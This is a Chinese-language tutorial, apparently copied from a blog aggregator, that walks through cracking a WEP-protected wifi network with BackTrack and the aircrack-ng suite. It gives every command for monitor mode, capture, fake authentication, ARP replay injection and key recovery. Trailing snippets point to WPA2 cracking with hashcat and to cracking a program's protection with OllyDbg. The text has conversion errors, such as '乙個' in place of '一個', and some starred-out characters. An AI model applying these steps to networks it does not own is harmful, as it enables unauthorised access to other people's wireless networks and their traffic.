用backtrack破解web密碼3分鐘教程

2021-12-29 21:58:57 字數 1420 閱讀 5771

首先, 需要準備:

1.backtrack 3/4 光碟版或者虛擬機器映象, 也可以是backtrack3 u盤版

2.乙個相容backtrack的無線網絡卡

3.使用web加密的無線網路加入點(指的就是你要破解的無線網路)

需要的全部指令:

(紅色字型的需要替換自身引數)

1) ifconfig -a

(可以檢視到自己機子無線網絡卡的mac位址和無線網絡卡的裝置名稱通常為usb0或者wlan0>), 保留這個視窗方便下幾步檢視需要的資訊, 開啟新命令視窗進入一步)

2) airmon-ng start wlan0 2

(wlan0為無線網絡卡, 2為需要監聽的頻道, 根據自己情況輸入, 此步驟為開啟無線網絡卡的監聽模式)

3) airodump-ng –ivs -w name -c 2 wlan0

(獲取頻道2的所有無線ap的資訊, wlan0是無線網絡卡, 2為頻道, 這一步的頻道需要跟上一步的一致, 命令輸入後會顯示周圍所有頻道為*的無線ap,

顯示的列表:

bssid : 無線ap的mac 位址

pwr:ap訊號的大小

rxq: 干擾值

beacons:傳送和接受的資料報, 有資料傳輸的時候就會跳動

#data: 資料, 破解需要的最關鍵的就是這個

ch:頻道

mb:網路連線速度

essid:ap的名稱

保留這一視窗, 開啟新的命令視窗進入下一步)

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h *********x wlan0 -1 is -one

(傳送欺騙, ap_essid為ap的名稱, 例如linksys或者tp-link, ap_mac為ap的mac位址, 第三步的bssid就是ap的mac位址, *********為自己無線網絡卡的mac位址, 第一步可以看到. 這一步成功後會顯示successful, 如不成功需要在訊號強的地方重試, 成功後才可以進入下一步)

5) aireplay-ng -3 -b ap_mac -h *********x -x 1024 wlan0

(ap_mac為無線ap的mac位址, 具體看步驟3, ******xx為無線網絡卡的mac位址, wlan0為網絡卡, 這一步執行以後, 開始正確的收發資料報, #data開始**)

6) aircrack-ng -n 64 -b ap_mac name-01.ivs

(開始破解, ap_mac為ap的mac位址, 64指的是使用了64位加密, 多次破解失敗的話可以試128)

多數情況下當#data開始迅速跳動的時候就可以開始破解了, 不需要等到多少包, 如果#data這個資料增長緩慢的話, 換個位置到無線訊號強的地方再試, 命令輸入正確的話最快3分鐘搞定乙個64位加密的web ap是沒問題的!

摘自 kuji labs

Backtrack破解wi fi熱點密碼

也許您已經知道了在設定無線密碼的時候一定要使用wpa加密的方式,因為wep加密會非常容易被破解,那到底有多容易呢?本文將會告訴你如何用backtrack輕鬆破解無線密碼。今天這個教程將一步步教您如何通過使用backtrak系統破解wep加密的 但首先,你必須明白知識雖然是一種力量,但擁有知識並不意味...

用 hashcat 破解 WIFI WPA2破解

首先用cdlinux系統進行抓包,cdlinux抓包我就不詳細說明 到這裡可以檢視如何安裝cdlinux 到這裡可以檢視如何使用cdlinux 進入正題 hashcat是用來破解wpa2的包,當然也可以破解很多東西 如系統密碼 rar md5等等,它比較受歡迎 windows 和linux 都可以,...

用OllyDbg做破解

朋友所託,要幫忙破解乙個mfc的小程式,他急等著用 背景 幾個人合夥創業,其中乙個負責寫這個有點小核心的專案,為了鞏固自己的 地位 搞的小把戲,給加了密,要用必須通過他 我艹 雖說自己搞c 比較多,相對來講native一點,但是對於彙編與破解,了解相當有限,去年這朋友也找過我,因為當時剛換公司比較忙...